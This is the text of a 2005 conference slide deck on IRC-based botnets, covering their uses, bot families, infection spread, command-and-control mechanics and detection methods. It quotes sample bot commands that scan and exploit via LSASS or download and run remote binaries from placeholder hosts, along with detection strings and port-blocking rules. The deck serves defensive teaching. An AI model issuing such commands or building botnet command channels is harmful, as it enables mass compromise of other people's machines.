BOTNETS

Randy Marchany
marchany@vt.edu
VA Tech IT Security Lab
VASCAN 2005

VASCAN 2005 Copyright Marchany 1

2005
What are Botnets?
 An IRC based, command and control
network of compromised hosts (bots)
 A bot is a client program that runs in the
background of a compromised host
 Watches for certain strings on an IRC channel
 These are encoded commands for the bot
 Purpose
 DoS, ID Theft, Phishing, keylogging, spam
 Fun AND profit

VASCAN 2005 Copyright Marchany 2

2005
Why IRC?
 IRC servers are:
 freely available
 easy to manage
 easy to subvert
 Attackers have experience with IRC
 IRC bots usually have a way to
remotely upgrade victims with new
payloads to stay ahead of security
efforts

VASCAN 2005 Copyright Marchany 3

2005
Nothing New
 Command and controllers based on
DDOS and military models
 C&C functions mostly centralized
 IRC Servers
 Well known DNS names
 CERT 10/2001 “Trends in DoS”
paper discussed this concept

VASCAN 2005 Copyright Marchany 4

2005
How bad is the problem?
 Symantec identified a 400K node
botnet
 Netadmin in the Netherlands
discovered 1-2M unique IPs
associated with Phatbot infections.
Phatbot harvests MyDoom and
Bagel infected machines. Phabot is
a bot.

VASCAN 2005 Copyright Marchany 5

2005
Spreading Problem
 Spreading mechanism is a leading
cause of background noise
 Port 445, 135, 139, 137 accounted for
80% of traffic captured by German
Honeynet Project
 Other ports
 2745 – bagle backdoor
 3127 – MyDoom backdoor
 3410 – Optix trojan backdoor
 5000 – upnp vulnerability

VASCAN 2005 Copyright Marchany 6

2005
Spread Model – Scan Rate: 1/Minute

 575K hosts
scanned
 Worms scan entire
IP address space
 60% vulnerable
systems online
 Infects all systems
within 20 weeks

VASCAN 2005 Copyright Marchany 7

2005
Spread Model – Scan Rate: 1/day

 35K hosts on VT
net
 Scan rate: 1/day
 All hosts
vulnerable
 Total infection
after 25 days

VASCAN 2005 Copyright Marchany 8

2005
Spread Model – Scan Rate: 1/hr

 35K hosts on VT
net
 Scan rate: 1/hr
 All hosts
vulnerable
 Total infection
after 25 hours

VASCAN 2005 Copyright Marchany 9

2005
Spread Models – Super Fast
 Spread rate: 4k
scans/sec
 35K hosts on VT
net
 All hosts vulnerable
 Total infection after
4 msec
 Random scan
pattern

VASCAN 2005 Copyright Marchany 10

2005
Botnet Uses
 DDOS
 Spam
 Sniffing traffic
 Keylogging
 Installing Advertisement Addons and
Browser Helper Objects (BHOs)
 Manipulating online polls/games
 Mass ID theft

VASCAN 2005 Copyright Marchany 11

2005
Botnet Clients
 Agobot/Phatbot/Forbot/XtremBot
 Written in C++, source in GPL
 Modular structure allows expansion of
commands and scanning abilities
 Uses libpcap, Perl Compatible Regular
Expressions (PCRE) to sniff traffic
 Uses NTFS Alternate Data Stream (ADS)
 Offers Rootkit functions like hiding process
 detects debuggers (Softice, OllyDbg), VMWare
 Can Use C&C protocol other than IRC

VASCAN 2005 Copyright Marchany 12

2005
Botnet Clients
 SDBot/RBot/UrBot/URXBot
 Most active currently
 Written in poor C and GPL’d
 Popular with attackers
 mIRC-based Bots, GT-Bot
 GT = Global Threat and common name
for all mIRC-scripted bots
 Launch an mIRC chat client with a set of
scripts and other binaries
 Has .mrc extension

VASCAN 2005 Copyright Marchany 13

2005
Botnet Clients
 DSNX Bots
 Written in C++ with plugin I/F
 http://www.securityforest.com/wiki/index.php/
Category:Maintaining_Access
 Q8 Bots
 Very small – 926 lines of C
 Written for linux/unix
 Kaiten
 Written for linux/unix
 Weak user authentication – easy to hijack

VASCAN 2005 Copyright Marchany 14

2005
Bot Attack Strategy
 Recruitment of the agent network
 Finding vulnerable systems
 Breaking into vulnerable systems
 Protocol attack
 Middleware attack

 Application or resource attack

 Controlling the agent network

 Direct, Indirect commands
 Updating malware
 Unwitting agents

VASCAN 2005 Copyright Marchany 15

2005
Finding Vulnerable Systems
 Blended threat scanning
 Program(s) that provide command &
control using IRC bots
 IRC commands tells bot(e.g. Power)
to do a netblock scan
 Bot builds list of vulnerable hosts,
informs attacker via botnet
 Attacker gets file and adds to master
list

VASCAN 2005 Copyright Marchany 16

2005
 Scanning for recruits

Black – C&C
Red – Scan info VASCAN 2005 Copyright Marchany 17
2005
Malware Propogation
 Central repository
 Malware sits on FTP/WWW server
 Victim download code from there
 Trinoo, shaft, W32/Leaves, W32/SoBig
 Back-Chaining (pull)
 Malware xferred from victim to next
 Exploit, copy code, repeat with next host
 Push or Forward
 Exploit contains the malware so no copy

VASCAN 2005 Copyright Marchany 18

2005
How they work
 Exploit host
 Use TFTP, FTP, HTTP, CSend (IRC
extension) to xfer itself to victim
 Binary starts and attempts to connect
to the hard-coded master IRC server
 Dynamic DNS name can be used to allow
the server to move around
 Bot tries to join master’s channel
 Sometimes password protected

VASCAN 2005 Copyright Marchany 19

2005
 How they work

<- :irc1. XXXXXX.XXX NOTICE AUTH :*** looking up your Hostname

<- :irc1.XXXXXX.XXX NOTICE AUTH :*** Found your hostname
->PASS secretserverpass
->NICK [urX] – 700159
->USER mltfvt 0 0 :mltfvt
<- :irc1.XXXXXX.XXX NOTICE [urX] – 700159 :*** if you are
having problems connecting due
<-PING :ED322722
->PONG: ED322722
<- :irc.XXXXXX.XXX 001 [urX[-700159 :Welcome to irc1.XXXXXX.XXX
IRC Network [urX}

VASCAN 2005 Copyright Marchany 20

2005
How they work
 Server accepts bot as a client and
sends:
 RPL_SUPPORT
 What features the server supports
 RPL_MODSTART
 RPL_MOTD
 RPL_ENDOFMOTD
 ERR_NOMOTD
 No MOTD available

VASCAN 2005 Copyright Marchany 21

2005
How they work
 On RPL_ENDOFMOTD or
ERR_NOMOTD
 Bot tries to join master’s channel with
the provided password
 JOIN #foobar channelpassword
 Bot receives the channel topic and
interprets it as a command
 .advscan lsass 200 5 0 –r –s
 Spread using LSASS hole, 200 concurrent
threads, delay 5 sec, random, silent scn

VASCAN 2005 Copyright Marchany 22

2005
How they work
 “.http.update http://<server>/-
mugenxu/rBot.exe
c:\msys32awds.exe 1”
 Download binary from www site and run
it (parameter 1)
 If nothing, idle awaiting command
 Bot tells master on completion
 IRC server/daemon (IRCd) provides
channels userlist

VASCAN 2005 Copyright Marchany 23

2005
How they work
 Botnet controller authenticates to
take control of bots
 Some bot commands
 Search for sensitive info on bot’d hosts
 DCC –sending these file to another
 DDOS a victim
 Enable keylogger and look for Paypal or
eBay account info

VASCAN 2005 Copyright Marchany 24

2005
Wait, we’re not dumb
 Only beginners start a botnet on
normal IRCd
 Too obvious to spot
 2 IRCd versions used for botnets
 Unreal IRCd (www.unrealircd.com)
 Cross platform, links Unix and Windows
 ConferenceRoom (www.webmaster/com
)
 cracked Commercial IRCd
 Microsoft ChatServer

VASCAN 2005 Copyright Marchany 25

2005
Rogue IRC Servers
 Random ports used to evade IDS
 Disabled or booby-trapped
commands
 Password protected servers
 Hidden or keyed channels
 Promoting a bot already running on
a machine

VASCAN 2005 Copyright Marchany 26

2005
Protecting the botnet
 Encrypted C&C channels
 Non-IRC based C&C
 IPv6 networks
 Distributed controllers

VASCAN 2005 Copyright Marchany 27

2005
Rogue Clues
 High invisible to visible user ratio
 High user to channel ratio
 Server display name doesn’t match
IP
 Suspicious nicks, topics, channel
names
 Suspicious A RR(s) associated with
DNS name

VASCAN 2005 Copyright Marchany 28

2005
Shades of Rogue
 Some IRC nets are used for warez
file trading
 Bots with backdoor FTP servers
common
 XDCC used to serve files to clients
 Legit servers used for bot migration
 IRC ops are hesitant to stop the
offenders

VASCAN 2005 Copyright Marchany 29

2005
Spot the bot
 Since bot tries to phone home, we
can use this to our advantage
 Can use a Honeynet configuration
 Snort_inline for suspicious
connections
 “332”
 “TOPIC”
 “PRIVMSG”
 “NOTICE”

VASCAN 2005 Copyright Marchany 30

2005
Spot the bot
 Traffic spikes may indicate incoming
botnet
 Similar idle connections on multiple
hosts may be bots
 Analogous nicks in a channel may
be bots

VASCAN 2005 Copyright Marchany 31

2005
Spot the bot

Welcome to irc.whitehouse.gov
Your host is h4x0r.ownz.j00
There are 9556 users and 9542 invisible on 1 server
5 : channels formed
1: operators online
Channel Users Topic
#help 1
#oldbots 5 .download
http://w4r3z.example.org/r00t.exe
End of /LIST

VASCAN 2005 Copyright Marchany 32

2005
Spot the bot
 Keep netflow data
 Sink holes, dark space, bogon
monitoring
 IDS, tap and scrubbing tools
 Remote triggered black holes
 Host quarantines

VASCAN 2005 Copyright Marchany 33

2005
 Spot the bot
 Rate limit uncommon protocols, ports
 Anti-spoof filters
 Ingress/egress filters for C&C filter
 Cisco interactive flow monitor
 show ip cache flow
 Flow tools
 http://www.splintered.net/sw/flow-tools
 Nfdump – http://nfdump.sourceforge.net

VASCAN 2005 Copyright Marchany 34

2005
Spot the bot
 Flow monitor inside the net not just at
the border
 Resnet, adminet, research nets
 TCP dport 6667 flows to unlikely
netblocks
 Single source to multi-destination dark
space or short flows
 SYNs coupled with unreachable or RSTs
 TFTP flows

VASCAN 2005 Copyright Marchany 35

2005
Spot the bot
 Idle, rhythmic IRC traffic (30/60/90
sec)
 TCP port 113 on Windows suggests
a bot
 FTP on odd ports
 Common C&C strings
 advscan lsass \d+ \d+ \d+(\-[a-
z])+

VASCAN 2005 Copyright Marchany 36

2005
Sample Windows XP Bot catcher

 ipseccmd –w REG –p botcatcher –r

TCP445 –f ):=*:445:TCP –n BLOCK
 ipseccmd –w REG –p botcatcher –r TCP135
–f ):=*:135:TCP –n BLOCK
 ipseccmd –w REG –p botcatcher –r TCP139
–f ):=*:139:TCP –n BLOCK
 ipseccmd –w REG –p botcatcher –r ICMP –f
):=*::ICMP –n BLOCK
 ipseccmd –w REG –p botcatcher –r HTTP –f
):=*:80:TCP –n BLOCK

VASCAN 2005 Copyright Marchany 37

2005
Observing Botnets
 Reconnect into the botnet
 Setup irssi (console based IRC client)
 Disable all auto response triggering
commands
 Limit replies to “CTCP VERSION”
command
 CTCP – Client-To-Client-Protocol

 Very TIME CONSUMING to do

VASCAN 2005 Copyright Marchany 38

2005
Lessons Learned
 Honeynet project tracked 100 botnets in a
4 month period
 Currently tracking 35 active botnets
 Honeynet saw 226585 unique IP
addresses joining at least 1 botnet
 Honeynet monitored up to 50K host
botnets
 Honeynet observed 226 DDOS attacks
against 99 targets from 11/1/04-1/31/05

VASCAN 2005 Copyright Marchany 39

2005
Lessons Learned
 “.advscan lsass 150 5 0 –r –s” and
similar commands were the most
common observed in botnets
 “.getcdkeys” used to request list of
CD-keys for Windows or games
 Frequent updates of botnetst

VASCAN 2005 Copyright Marchany 40

2005
References
 John Kristoff (jtk@northwestern.edu),
“BOTNETS” NANOG32 presentation
 “Know your Enemy: Tracking Botnets”,
Lance Spitzner,
http://www.honeynet.org/papers/bots
 http://www.securityforest.com/wiki/index
.php/Category:Maintaining_Access

VASCAN 2005 Copyright Marchany 41

2005